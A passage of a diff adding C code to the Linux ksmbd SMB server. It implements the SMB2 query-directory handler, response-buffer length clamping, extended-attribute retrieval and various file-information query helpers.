++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	case SMB_FIND_FILE_POSIX_INFO:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
++	return 0;
++}
++
++static int smb2_resp_buf_len(struct ksmbd_work *work, unsigned short hdr2_len)
++{
++	int free_len;
++
++	free_len = (int)(work->response_sz -
++		(get_rfc1002_len(work->response_buf) + 4)) - hdr2_len;
++	return free_len;
++}
++
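++/*
++ * Clamp the client-requested output buffer length to both the
++ * connection's max transaction size and the free space remaining in
++ * the response buffer.
++ */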
++static int smb2_calc_max_out_buf_len(struct ksmbd_work *work,
++				     unsigned short hdr2_len,
++				     unsigned int out_buf_len)
++{
++	int free_len;
++
++	if (out_buf_len > work->conn->vals->max_trans_size)
++		return -EINVAL;
++
++	free_len = smb2_resp_buf_len(work, hdr2_len);
++	if (free_len < 0)
++		return -EINVAL;
++
++	return min_t(int, out_buf_len, free_len);
++}
++
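++/**
++ * smb2_query_dir() - handler for smb2 query directory command
++ * @work:	smb work containing query directory request buffer
++ *
++ * Return:	0
++ */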
++int smb2_query_dir(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_query_directory_req *req;
++	struct smb2_query_directory_rsp *rsp;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	struct ksmbd_file *dir_fp = NULL;
++	struct ksmbd_dir_info d_info;
++	int rc = 0;
++	char *srch_ptr = NULL;
++	unsigned char srch_flag;
++	int buffer_sz;
++	struct smb2_query_dir_private query_dir_private = {NULL, };
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (ksmbd_override_fsids(work)) {
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		smb2_set_err_rsp(work);
++		return -ENOMEM;
++	}
++
++	rc = verify_info_level(req->FileInformationClass);
++	if (rc) {
++		rc = -EFAULT;
++		goto err_out2;
++	}
++
++	dir_fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!dir_fp) {
++		rc = -EBADF;
++		goto err_out2;
++	}
++
++	if (!(dir_fp->daccess & FILE_LIST_DIRECTORY_LE) ||
++	    inode_permission(file_mnt_user_ns(dir_fp->filp),
++			     file_inode(dir_fp->filp),
++			     MAY_READ | MAY_EXEC)) {
++		pr_err("no right to enumerate directory (%pD)\n", dir_fp->filp);
++		rc = -EACCES;
++		goto err_out2;
++	}
++
++	if (!S_ISDIR(file_inode(dir_fp->filp)->i_mode)) {
++		pr_err("can't do query dir for a file\n");
++		rc = -EINVAL;
++		goto err_out2;
++	}
++
++	srch_flag = req->Flags;
++	srch_ptr = smb_strndup_from_utf16(req->Buffer,
++					  le16_to_cpu(req->FileNameLength), 1,
++					  conn->local_nls);
++	if (IS_ERR(srch_ptr)) {
++		ksmbd_debug(SMB, "Search Pattern not found\n");
++		rc = -EINVAL;
++		goto err_out2;
++	} else {
++		ksmbd_debug(SMB, "Search pattern is %s\n", srch_ptr);
++	}
++
++	if (srch_flag & SMB2_REOPEN || srch_flag & SMB2_RESTART_SCANS) {
++		ksmbd_debug(SMB, "Restart directory scan\n");
++		generic_file_llseek(dir_fp->filp, 0, SEEK_SET);
++	}
++
++	memset(&d_info, 0, sizeof(struct ksmbd_dir_info));
++	d_info.wptr = (char *)rsp->Buffer;
++	d_info.rptr = (char *)rsp->Buffer;
++	d_info.out_buf_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (d_info.out_buf_len < 0) {
++		rc = -EINVAL;
++		goto err_out;
++	}
++	d_info.flags = srch_flag;
++
++	/*
++	 * Reserve dot and dotdot entries at the head of the buffer
++	 * in the first response.
++	 */
++	rc = ksmbd_populate_dot_dotdot_entries(work, req->FileInformationClass,
++					       dir_fp, &d_info, srch_ptr,
++					       smb2_populate_readdir_entry);
++	if (rc == -ENOSPC)
++		rc = 0;
++	else if (rc)
++		goto err_out;
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_HIDE_DOT_FILES))
++		d_info.hide_dot_file = true;
++
++	buffer_sz				= d_info.out_buf_len;
++	d_info.rptr				= d_info.wptr;
++	query_dir_private.work			= work;
++	query_dir_private.search_pattern	= srch_ptr;
++	query_dir_private.dir_fp		= dir_fp;
++	query_dir_private.d_info		= &d_info;
++	query_dir_private.info_level		= req->FileInformationClass;
++	dir_fp->readdir_data.private		= &query_dir_private;
++	set_ctx_actor(&dir_fp->readdir_data.ctx, __query_dir);
++
++	rc = iterate_dir(dir_fp->filp, &dir_fp->readdir_data.ctx);
++	/*
++	 * If req->OutputBufferLength is too small to contain even one
++	 * entry, immediately return OutputBufferLength 0 to the client.
++	 */
++	if (!d_info.out_buf_len && !d_info.num_entry)
++		goto no_buf_len;
++	if (rc > 0 || rc == -ENOSPC)
++		rc = 0;
++	else if (rc)
++		goto err_out;
++
++	d_info.wptr = d_info.rptr;
++	d_info.out_buf_len = buffer_sz;
++	rc = process_query_dir_entries(&query_dir_private);
++	if (rc)
++		goto err_out;
++
++	if (!d_info.data_count && d_info.out_buf_len >= 0) {
++		if (srch_flag & SMB2_RETURN_SINGLE_ENTRY && !is_asterisk(srch_ptr)) {
++			rsp->hdr.Status = STATUS_NO_SUCH_FILE;
++		} else {
++			dir_fp->dot_dotdot[0] = dir_fp->dot_dotdot[1] = 0;
++			rsp->hdr.Status = STATUS_NO_MORE_FILES;
++		}
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(0);
++		rsp->OutputBufferLength = cpu_to_le32(0);
++		rsp->Buffer[0] = 0;
++		inc_rfc1001_len(work->response_buf, 9);
++	} else {
++no_buf_len:
++		((struct file_directory_info *)
++		((char *)rsp->Buffer + d_info.last_entry_offset))
++		->NextEntryOffset = 0;
++		if (d_info.data_count >= d_info.last_entry_off_align)
++			d_info.data_count -= d_info.last_entry_off_align;
++
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(72);
++		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
++		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
++	}
++
++	kfree(srch_ptr);
++	ksmbd_fd_put(work, dir_fp);
++	ksmbd_revert_fsids(work);
++	return 0;
++
++err_out:
++	pr_err("error while processing smb2 query dir rc = %d\n", rc);
++	kfree(srch_ptr);
++
++err_out2:
++	if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_NO_SUCH_FILE;
++	else if (rc == -EBADF)
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++	else if (rc == -ENOMEM)
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++	else if (rc == -EFAULT)
++		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++	else if (rc == -EIO)
++		rsp->hdr.Status = STATUS_FILE_CORRUPT_ERROR;
++	if (!rsp->hdr.Status)
++		rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, dir_fp);
++	ksmbd_revert_fsids(work);
++	return 0;
++}
++
++/**
++ * buffer_check_err() - helper function to check buffer errors
++ * @reqOutputBufferLength:	max buffer length expected in command response
++ * @rsp:		query info response buffer containing the output buffer length
++ * @rsp_org:		base response buffer pointer in case of chained response
++ * @infoclass_size:	query info class response buffer size
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int buffer_check_err(int reqOutputBufferLength,
++			    struct smb2_query_info_rsp *rsp,
++			    void *rsp_org, int infoclass_size)
++{
++	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
++		if (reqOutputBufferLength < infoclass_size) {
++			pr_err("Invalid Buffer Size Requested\n");
++			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
++			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
++			return -EINVAL;
++		}
++
++		ksmbd_debug(SMB, "Buffer Overflow\n");
++		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
++				reqOutputBufferLength);
++		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
++	}
++	return 0;
++}
++
++static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
++				   void *rsp_org)
++{
++	struct smb2_file_standard_info *sinfo;
++
++	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
++
++	sinfo->AllocationSize = cpu_to_le64(4096);
++	sinfo->EndOfFile = cpu_to_le64(0);
++	sinfo->NumberOfLinks = cpu_to_le32(1);
++	sinfo->DeletePending = 1;
++	sinfo->Directory = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_standard_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
++}
++
++static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
++				   void *rsp_org)
++{
++	struct smb2_file_internal_info *file_info;
++
++	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
++
++	/* any unique number */
++	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_internal_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
++}
++
++static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
++				   struct smb2_query_info_req *req,
++				   struct smb2_query_info_rsp *rsp,
++				   void *rsp_org)
++{
++	u64 id;
++	int rc;
++
++	/*
++	 * Windows can sometimes send a query file info request on a
++	 * pipe without opening it; check for that error condition here.
++	 */
++	id = req->VolatileFileId;
++	if (!ksmbd_session_rpc_method(sess, id))
++		return -ENOENT;
++
++	ksmbd_debug(SMB, "FileInfoClass %u, FileId 0x%llx\n",
++		    req->FileInfoClass, req->VolatileFileId);
++
++	switch (req->FileInfoClass) {
++	case FILE_STANDARD_INFORMATION:
++		get_standard_info_pipe(rsp, rsp_org);
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, rsp_org,
++				      FILE_STANDARD_INFORMATION_SIZE);
++		break;
++	case FILE_INTERNAL_INFORMATION:
++		get_internal_info_pipe(rsp, id, rsp_org);
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, rsp_org,
++				      FILE_INTERNAL_INFORMATION_SIZE);
++		break;
++	default:
++		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
++			    req->FileInfoClass);
++		rc = -EOPNOTSUPP;
++	}
++	return rc;
++}
++
++/**
++ * smb2_get_ea() - handler for smb2 get extended attribute command
++ * @work:	smb work containing query info command buffer
++ * @fp:		ksmbd_file pointer
++ * @req:	get extended attribute request
++ * @rsp:	response buffer pointer
++ * @rsp_org:	base response buffer pointer in case of chained response
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
++		       struct smb2_query_info_req *req,
++		       struct smb2_query_info_rsp *rsp, void *rsp_org)
++{
++	struct smb2_ea_info *eainfo, *prev_eainfo;
++	char *name, *ptr, *xattr_list = NULL, *buf;
++	int rc, name_len, value_len, xattr_list_len, idx;
++	ssize_t buf_free_len, alignment_bytes, next_offset, rsp_data_cnt = 0;
++	struct smb2_ea_info_req *ea_req = NULL;
++	const struct path *path;
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++
++	if (!(fp->daccess & FILE_READ_EA_LE)) {
++		pr_err("Not permitted to read ext attr : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	path = &fp->filp->f_path;
++	/* a single EA entry is requested with the given user.* name */
++	if (req->InputBufferLength) {
++		if (le32_to_cpu(req->InputBufferLength) <
++		    sizeof(struct smb2_ea_info_req))
++			return -EINVAL;
++
++		ea_req = (struct smb2_ea_info_req *)req->Buffer;
++	} else {
++		/* need to send all EAs if no specific EA is requested */
++		if (le32_to_cpu(req->Flags) & SL_RETURN_SINGLE_ENTRY)
++			ksmbd_debug(SMB,
++				    "All EAs are requested but need to send single EA entry in rsp flags 0x%x\n",
++				    le32_to_cpu(req->Flags));
++	}
++
++	buf_free_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (buf_free_len < 0)
++		return -EINVAL;
++
++	rc = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (rc < 0) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		goto out;
++	} else if (!rc) { /* there is no EA in the file */
++		ksmbd_debug(SMB, "no ea data in the file\n");
++		goto done;
++	}
++	xattr_list_len = rc;
++
++	ptr = (char *)rsp->Buffer;
++	eainfo = (struct smb2_ea_info *)ptr;
++	prev_eainfo = eainfo;
++	idx = 0;
++
++	while (idx < xattr_list_len) {
++		name = xattr_list + idx;
++		name_len = strlen(name);
++
++		ksmbd_debug(SMB, "%s, len %d\n", name, name_len);
++		idx += name_len + 1;
++
++		/*
++		 * CIFS does not support EAs outside the user.* namespace;
++		 * still, keep the framework generic so that other attrs
++		 * can be listed in future.
++		 */
++		if (strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			continue;
++
++		if (!strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
++			     STREAM_PREFIX_LEN))
++			continue;
++
++		if (req->InputBufferLength &&
++		    strncmp(&name[XATTR_USER_PREFIX_LEN], ea_req->name,
++			    ea_req->EaNameLength))
++			continue;
++
++		if (!strncmp(&name[XATTR_USER_PREFIX_LEN],
++			     DOS_ATTRIBUTE_PREFIX, DOS_ATTRIBUTE_PREFIX_LEN))
++			continue;
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			name_len -= XATTR_USER_PREFIX_LEN;
++
++		ptr = (char *)(&eainfo->name + name_len + 1);
++		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
++				name_len + 1);
++		/* bail out if the xattr can't fit in buf_free_len */
++		value_len = ksmbd_vfs_getxattr(user_ns, path->dentry,
++					       name, &buf);
++		if (value_len <= 0) {
++			rc = -ENOENT;
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++			goto out;
++		}
++
++		buf_free_len -= value_len;
++		if (buf_free_len < 0) {
++			kfree(buf);
++			break;
++		}
++
++		memcpy(ptr, buf, value_len);
++		kfree(buf);
++
++		ptr += value_len;
++		eainfo->Flags = 0;
++		eainfo->EaNameLength = name_len;
++
++		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
++			memcpy(eainfo->name, &name[XATTR_USER_PREFIX_LEN],
++			       name_len);
++		else
++			memcpy(eainfo->name, name, name_len);
++
++		eainfo->name[name_len] = '\0';
++		eainfo->EaValueLength = cpu_to_le16(value_len);
++		next_offset = offsetof(struct smb2_ea_info, name) +
++			name_len + 1 + value_len;
++
++		/* align the next xattr entry on a 4-byte boundary */
++		alignment_bytes = ((next_offset + 3) & ~3) - next_offset;
++		if (alignment_bytes) {
++			memset(ptr, '\0', alignment_bytes);
++			ptr += alignment_bytes;
++			next_offset += alignment_bytes;
++			buf_free_len -= alignment_bytes;
++		}
++		eainfo->NextEntryOffset = cpu_to_le32(next_offset);
++		prev_eainfo = eainfo;
++		eainfo = (struct smb2_ea_info *)ptr;
++		rsp_data_cnt += next_offset;
++
++		if (req->InputBufferLength) {
++			ksmbd_debug(SMB, "single entry requested\n");
++			break;
++		}
++	}
++
++	/* no more ea entries */
++	prev_eainfo->NextEntryOffset = 0;
++done:
++	rc = 0;
++	if (rsp_data_cnt == 0)
++		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
++	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
++	inc_rfc1001_len(rsp_org, rsp_data_cnt);
++out:
++	kvfree(xattr_list);
++	return rc;
++}
++
++static void get_file_access_info(struct smb2_query_info_rsp *rsp,
++				 struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_access_info *file_info;
++
++	file_info = (struct smb2_file_access_info *)rsp->Buffer;
++	file_info->AccessFlags = fp->daccess;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_access_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
++}
++
++static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
++			       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_basic_info *basic_info;
++	struct kstat stat;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	basic_info = (struct smb2_file_basic_info *)rsp->Buffer;
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	basic_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	basic_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	basic_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	basic_info->ChangeTime = cpu_to_le64(time);
++	basic_info->Attributes = fp->f_ci->m_fattr;
++	basic_info->Pad1 = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_basic_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
++	return 0;
++}
++
++static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_standard_info *sinfo;
++	unsigned int delete_pending;
++	struct inode *inode;
++	struct kstat stat;
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	sinfo = (struct smb2_file_standard_info *)rsp->Buffer;
++	delete_pending = ksmbd_inode_pending_delete(fp);
++
++	sinfo->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
++	sinfo->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	sinfo->NumberOfLinks = cpu_to_le32(get_nlink(&stat) - delete_pending);
++	sinfo->DeletePending = delete_pending;
++	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_standard_info));
++	inc_rfc1001_len(rsp_org,
++			sizeof(struct smb2_file_standard_info));
++}
++
++static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
++				    void *rsp_org)
++{
++	struct smb2_file_alignment_info *file_info;
++
++	file_info = (struct smb2_file_alignment_info *)rsp->Buffer;
++	file_info->AlignmentRequirement = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
++	inc_rfc1001_len(rsp_org,
++			sizeof(struct smb2_file_alignment_info));
++}
++
++static int get_file_all_info(struct ksmbd_work *work,
++			     struct smb2_query_info_rsp *rsp,
++			     struct ksmbd_file *fp,
++			     void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_all_info *file_info;
++	unsigned int delete_pending;
++	struct inode *inode;
++	struct kstat stat;
++	int conv_len;
++	char *filename;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		ksmbd_debug(SMB, "no right to read the attributes : 0x%x\n",
++			    fp->daccess);
++		return -EACCES;
++	}
++
++	filename = convert_to_nt_pathname(work->tcon->share_conf, &fp->filp->f_path);
++	if (IS_ERR(filename))
++		return PTR_ERR(filename);
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	ksmbd_debug(SMB, "filename = %s\n", filename);
++	delete_pending = ksmbd_inode_pending_delete(fp);
++	file_info = (struct smb2_file_all_info *)rsp->Buffer;
++
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->Attributes = fp->f_ci->m_fattr;
++	file_info->Pad1 = 0;
++	file_info->AllocationSize =
++		cpu_to_le64(inode->i_blocks << 9);
++	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	file_info->NumberOfLinks =
++			cpu_to_le32(get_nlink(&stat) - delete_pending);
++	file_info->DeletePending = delete_pending;
++	file_info->Directory = S_ISDIR(stat.mode) ? 1 : 0;
++	file_info->Pad2 = 0;
++	file_info->IndexNumber = cpu_to_le64(stat.ino);
++	file_info->EASize = 0;
++	file_info->AccessFlags = fp->daccess;
++	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
++	file_info->Mode = fp->coption;
++	file_info->AlignmentRequirement = 0;
++	conv_len = smbConvertToUTF16((__le16 *)file_info->FileName, filename,
++				     PATH_MAX, conn->local_nls, 0);
++	conv_len *= 2;
++	file_info->FileNameLength = cpu_to_le32(conv_len);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
++	kfree(filename);
++	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
++	return 0;
++}
++
++static void get_file_alternate_info(struct ksmbd_work *work,
++				    struct smb2_query_info_rsp *rsp,
++				    struct ksmbd_file *fp,
++				    void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_alt_name_info *file_info;
++	struct dentry *dentry = fp->filp->f_path.dentry;
++	int conv_len;
++
++	spin_lock(&dentry->d_lock);
++	file_info = (struct smb2_file_alt_name_info *)rsp->Buffer;
++	conv_len = ksmbd_extract_shortname(conn,
++					   dentry->d_name.name,
++					   file_info->FileName);
++	spin_unlock(&dentry->d_lock);
++	file_info->FileNameLength = cpu_to_le32(conv_len);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
++	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
++}
++
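++/*
++ * List the file's named streams: every xattr carrying the stream
++ * prefix is reported as an NTFS-style ":name" stream, and the default
++ * "::$DATA" stream is appended for regular files.
++ */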
++static void get_file_stream_info(struct ksmbd_work *work,
++				 struct smb2_query_info_rsp *rsp,
++				 struct ksmbd_file *fp,
++				 void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_stream_info *file_info;
++	char *stream_name, *xattr_list = NULL, *stream_buf;
++	struct kstat stat;
++	const struct path *path = &fp->filp->f_path;
++	ssize_t xattr_list_len;
++	int nbytes = 0, streamlen, stream_name_len, next, idx = 0;
++	int buf_free_len;
++	struct smb2_query_info_req *req = ksmbd_req_buf_next(work);
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	file_info = (struct smb2_file_stream_info *)rsp->Buffer;
++
++	buf_free_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (buf_free_len < 0)
++		goto out;
++
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	while (idx < xattr_list_len) {
++		stream_name = xattr_list + idx;
++		streamlen = strlen(stream_name);
++		idx += streamlen + 1;
++
++		ksmbd_debug(SMB, "%s, len %d\n", stream_name, streamlen);
++
++		if (strncmp(&stream_name[XATTR_USER_PREFIX_LEN],
++			    STREAM_PREFIX, STREAM_PREFIX_LEN))
++			continue;
++
++		stream_name_len = streamlen - (XATTR_USER_PREFIX_LEN +
++				STREAM_PREFIX_LEN);
++		streamlen = stream_name_len;
++
++		/* plus one byte for the leading ':' */
++		streamlen += 1;
++		stream_buf = kmalloc(streamlen + 1, GFP_KERNEL);
++		if (!stream_buf)
++			break;
++
++		streamlen = snprintf(stream_buf, streamlen + 1,
++				     ":%s", &stream_name[XATTR_NAME_STREAM_LEN]);
++
++		next = sizeof(struct smb2_file_stream_info) + streamlen * 2;
++		if (next > buf_free_len) {
++			kfree(stream_buf);
++			break;
++		}
++
++		file_info = (struct smb2_file_stream_info *)&rsp->Buffer[nbytes];
++		streamlen  = smbConvertToUTF16((__le16 *)file_info->StreamName,
++					       stream_buf, streamlen,
++					       conn->local_nls, 0);
++		streamlen *= 2;
++		kfree(stream_buf);
++		file_info->StreamNameLength = cpu_to_le32(streamlen);
++		file_info->StreamSize = cpu_to_le64(stream_name_len);
++		file_info->StreamAllocationSize = cpu_to_le64(stream_name_len);
++
++		nbytes += next;
++		buf_free_len -= next;
++		file_info->NextEntryOffset = cpu_to_le32(next);
++	}
++
++out:
++	if (!S_ISDIR(stat.mode) &&
++	    buf_free_len >= sizeof(struct smb2_file_stream_info) + 7 * 2) {
++		file_info = (struct smb2_file_stream_info *)
++			&rsp->Buffer[nbytes];
++		streamlen = smbConvertToUTF16((__le16 *)file_info->StreamName,
++					      "::$DATA", 7, conn->local_nls, 0);
++		streamlen *= 2;
++		file_info->StreamNameLength = cpu_to_le32(streamlen);
++		file_info->StreamSize = cpu_to_le64(stat.size);
++		file_info->StreamAllocationSize = cpu_to_le64(stat.blocks << 9);
++		nbytes += sizeof(struct smb2_file_stream_info) + streamlen;
++	}
++
++	/* last entry offset should be 0 */
++	file_info->NextEntryOffset = 0;
++	kvfree(xattr_list);
++
++	rsp->OutputBufferLength = cpu_to_le32(nbytes);
++	inc_rfc1001_len(rsp_org, nbytes);
++}
++
++static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_internal_info *file_info;
++	struct kstat stat;
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
++	file_info->IndexNumber = cpu_to_le64(stat.ino);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_internal_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
++}
++
++static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
++				      struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_ntwrk_info *file_info;
++	struct inode *inode;
++	struct kstat stat;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	file_info = (struct smb2_file_ntwrk_info *)rsp->Buffer;
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->Attributes = fp->f_ci->m_fattr;
++	file_info->AllocationSize =
++		cpu_to_le64(inode->i_blocks << 9);
++	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	file_info->Reserved = cpu_to_le32(0);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
++	return 0;
++}
++
++static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
++{
++	struct smb2_file_ea_info *file_info;
++
++	file_info = (struct smb2_file_ea_info *)rsp->Buffer;
++	file_info->EASize = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_ea_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
++}
++
++static void get_file_position_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_pos_info *file_info;
++
++	file_info = (struct smb2_file_pos_info *)rsp->Buffer;
++	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_pos_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
++}
++
++static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
++			       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_mode_info *file_info;
++
++	file_info = (struct smb2_file_mode_info *)rsp->Buffer;
++	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_mode_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
++}
++
++static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
++				      struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_comp_info *file_info;
++	struct kstat stat;
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++
++	file_info = (struct smb2_file_comp_info *)rsp->Buffer;
